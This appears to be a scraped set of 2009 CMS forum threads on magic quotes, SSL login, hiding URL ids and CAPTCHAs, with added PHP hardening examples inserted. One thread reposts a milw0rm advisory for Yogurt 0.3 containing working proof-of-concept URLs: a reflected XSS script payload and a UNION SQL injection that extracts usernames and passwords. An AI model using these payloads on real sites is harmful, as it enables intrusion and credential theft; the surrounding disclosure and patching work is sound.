Magic quotes: Tool of Satan or safety net for imbys?

Just found that my server has magic quotes enabled. I've been looking at data sanitisation and validation lately, and my books pretty much say 'magic quotes are evil turn them off'.

Which is fine if the software (think modules) you are running properly escapes and validates data, but as we know sometimes it doesn't.

So what to do - leave it on, or turn it off? What do you do?



Re: SSL login - how to set up?

  • 2009/8/1 8:45:27
  • 63RD

of course it is, but regarding the "ssl login feature" the only encrypted thing is the login credentials.
if your server settings say that there is only one folder (httpdocs) for secure and "insecure" connections, then you can simply change the physical path in your trustpath mainfile. then you can access the site via https. another option is to maybe clone your whole site and put it directly into the httpsdocs folder. then your settings must respond to this as well, hence to search in the httpsdocs folder when entering the site via https.

there might be one thing that prevents you from running your site in ssl only: google. if you use any kind of google maps service on your site, you mustn't do that on an ssl site. if you want to, it needs a mapspro account that costs approx 10k usd per year.
this is a real issue when you want gmaps and for example a shop on your same site install. oledrion should have the feature to run it in ssl mode only while everything else uses just http, that would be fine but: if you have an ssl certificate, a bought one i mean, then you might be displeased that on a mixed system (http and https at the same physical location) your users get a warning that not every content is encrypted.
on the other hand, when you have an ssl site and don't mind google's rules, you may get away with a browser warning that there is non-encrypted content embedded in your ssl site because the maps api you get for free connects via a non-encrypted line.

it's kind of a dilemma.

bye

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


Re: SSL login - how to set up?

Hmm...is it possible to have my whole site in SSL? Or does this only do the login?



Re: SSL login - how to set up?

  • 2009/8/1 5:51:13
  • 63RD

yes you can
but: if your hosting setup says that there is only one folder (the httpdocs) for ssl and non-ssl connections, then you should put the ssl loginfile into an exclusive folder within your documentroot, hence, a folder without anything else in it. otherwise, your browser may come up with the panic notice that the connection is encrypted but that there are other unencrypted files.
if your ssl place is the httpsdocs documentroot and you physically reach this directory when typing https in your browser, then you can put the loginfile wherever you want.

i hope this is 100% correct. i tried it, but maybe there are possible differences i dont know about.

bye!

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


Re: SSL login - how to set up?

Thanks. Can I put the ssl directory in the web root for my site, or is it meant to sit outside the web root (like the trust path does)?



Re: SSL login - how to set up?

  • 2009/8/1 5:20:55
  • 63RD

hi!

no, there is one single file you have to put in your ssl encrypted place. example: http://www.xyz.com/ is your normal site's place. the ssl loginfile might reside in https://www.xyz.com

you find the file you need in the extras folder when you uncompress the icms install package.

hope this helps

bye!

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


SSL login - how to set up?

Just setting up a new site and thought, why not use the SSL login for a change. But I'm not clear on how it works:

Quote:

URL where SSL login page is located: https://



Do I need to build a new login page or something?



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Quote:


system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);




this whole query is not safe!! line 81 & line 83, and anywhere else in the module that is using mysql_query() & mysql_fetch_array()

because that means they are accessing the DB directly & not via the core DB Layer. they should be using $icmsDB->query() or $icmsDB->fetchArray() in the mysqldatabase Class etc. for example.

sorry not been around for a while, had problems which i can't discuss, and at moment i got no internet access at home, so at mums house at mo.

Live as if you were to die tomorrow, Learn as if you were to live forever

The beauty of a living thing is not the atoms that go into it, but the way those atoms are put together!


Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

  • 2009/6/28 6:25:20
  • 63RD

Quote:

patch sql injection

C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)

###############
change
################

Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)



hi!

i cant find this file in yogurt v3.3.3rc3. is there a chance to fix this in my version too?

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Have you tested this on the profile module included in ImpressCMS 1.2 alpha? I remember having fixed all these in it



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Dear lostmon,

thanks for info. We will fix this.



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

patch sql injection

C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)

###############
change
################

Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)

--
La curiosidad es lo que hace mover la mente...




Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

tomorrow i look to install and patch it
i don't test it in ImpressCMS but, anyway i look for patch it tomorrow.


------------------------------------------------------------------

Name : Yogurt
Site : http://sourceforge.net/projects/yogurt/
Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
Dork : "Yogurt build"

------------------------------------------------------------------


Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com

------------------------------------------------------------------


Description:

Bug : XSS

In index.php:

index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL

BUG : SQL INJECTION

system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);



In neither case was the method _GET filtered properly.
Other .phps also contain the failures; I'm posting the first one I found .. ^^

------------------------------------------------------------------


P0c:

XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>

First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.

SQLi :
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--



OBS: need register_globals=on;

------------------------------------------------------------------

# milw0rm.com [2009-06-11]

--
La curiosidad es lo que hace mover la mente...
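
Added example, not part of the advisory or of the Yogurt/ImpressCMS code: the two flagged lines (index.php:48 and system/writemessage.php:81) in hardened form, run against constructed inputs so the intval() patch posted in the reply can be compared with strict validation plus a bound parameter. The in-memory SQLite table, its rows and the function names are assumptions made for the demonstration.

```php
<?php
// Added example; not Yogurt or ImpressCMS code. Schema and rows are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');   // stand-in for the module's MySQL connection
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, body TEXT)');
$db->exec("INSERT INTO messages (id, body) VALUES (1, 'hello'), (2, 'second message')");

/** Accept only a plain decimal string; return null for anything else. */
function parseMessageId($raw): ?int
{
    // ?original[]=1 arrives as an array, so check the type before the content
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

/** writemessage.php line 81, hardened: validate, then bind instead of concatenating. */
function fetchMessage(PDO $db, $raw): ?array
{
    $id = parseMessageId($raw);
    if ($id === null) {
        return null;                // caller answers 400 and logs the request
    }
    $stmt = $db->prepare('SELECT id, body FROM messages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** index.php line 48, hardened: encode for the HTML context at output time. */
function renderMsg(string $msg): string
{
    return '<center>' . htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</center>';
}

// Constructed inputs: two valid ids, then values a tampered request could carry.
foreach (['1', '2', '1abc', '-1 union select 1,2,3', ''] as $raw) {
    $row = fetchMessage($db, $raw);
    printf("%-26s intval()=%-3d strict=%s\n", var_export($raw, true), intval($raw), $row['body'] ?? 'rejected');
}
echo renderMsg("<script>alert('br0ly')</script>"), "\n";
```

The intval() column shows what the posted one-line patch would pass to the query: the cast removes the injected SQL, but a tampered value such as '1abc' is silently turned into a valid id, whereas the strict path rejects it and gives the application something to log.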


Re: Options to hide URL

I suppose adding more security checks is one of the countermeasures I will take, perhaps in addition to encrypting it.

I was afraid you'd say mod_rewrite - it's a tough piece to implement.

I had considered POST - but thought it could not be done if it were part of the dynamic row - a button on every row with a hidden variable perhaps....?

Thanks guys for the feedback!



Re: Options to hide URL

Is exposing these variables really a problem?

I mean, it doesn't matter if a user manipulates this variable as long as you verify its integrity in the server.

For example, stop processing if the variable is not a number. If it's not a number and your code has no bugs, you can bet it has been manipulated.

If you can't understand what I'm saying, you're not geek enough
ISegura.es


Re: Options to hide URL

Don't use it as a URL parameter, use it as a post parameter for a form





Options to hide URL

Whenever a dynamic grid-list is built, we always dereference the ID for that row and pass it to the next page like:

"<a href='client.php?uid=".$uid."'>client</a>"

Exposing these ids can be a security problem - what are your suggestions for hiding this information? So far I have seen:

1. Apache redirect [a little beyond me at this point....]
2. $uid = base64_encode($uid) [seems reasonable....]

Appreciate the feedback!
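
Added example, not code from this thread: one way to do the server-side integrity check suggested in the replies, keeping the id readable in the link but attaching an HMAC so an edited id is detected, followed by the authorisation check that decides access in any case. The key, the viewer and client ids, the ownership table and all function names are assumptions.

```php
<?php
// Added example, not code from the thread. Key, ids and ownership table are constructed.
declare(strict_types=1);

// Assumption: the key is loaded from server-side config and never sent to the client.
const LINK_KEY = 'replace-with-a-random-32-byte-secret';

// base64_encode() is an encoding, not protection: base64_decode() reverses it
// without any key, so it neither hides the id nor detects a changed one.

/** Build the query string for a row link: the id plus an HMAC over viewer and id. */
function signClientLink(int $uid, int $viewerId): string
{
    $sig = hash_hmac('sha256', $viewerId . ':' . $uid, LINK_KEY);
    return http_build_query(['uid' => $uid, 'sig' => $sig]);
}

/** Return the uid if the parameters are well formed and the tag verifies, else null. */
function verifyClientLink(array $query, int $viewerId): ?int
{
    $uid = $query['uid'] ?? null;
    $sig = $query['sig'] ?? null;
    if (!is_string($uid) || !ctype_digit($uid) || strlen($uid) > 9 || !is_string($sig)) {
        return null;                       // not a number: stop processing
    }
    $expected = hash_hmac('sha256', $viewerId . ':' . $uid, LINK_KEY);
    return hash_equals($expected, $sig) ? (int) $uid : null;   // constant-time compare
}

/** The check that decides access: may this viewer see this client record? */
function mayView(array $acl, int $viewerId, int $uid): bool
{
    return in_array($uid, $acl[$viewerId] ?? [], true);
}

$acl = [5 => [17, 18], 6 => [19]];         // constructed: viewer id => client ids
parse_str(signClientLink(17, 5), $query);  // what client.php receives for viewer 5

var_dump(verifyClientLink($query, 5));     // untouched link
$query['uid'] = '19';                      // id edited in the address bar
var_dump(verifyClientLink($query, 5));     // tag no longer matches the id
var_dump(mayView($acl, 5, 19));            // ownership check, independent of the tag
```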



New alternatives in CAPTCHA?

Found two articles in Sitepoint regarding the subject. Worth reading.

http://www.sitepoint.com/blogs/2009/05/10/googles-new-capcha-the-only-way-is-up/#comment-925430

http://www.sitepoint.com/blogs/2009/05/11/avoid-captchas/#comment-925431

If you can't understand what I'm saying, you're not geek enough
ISegura.es


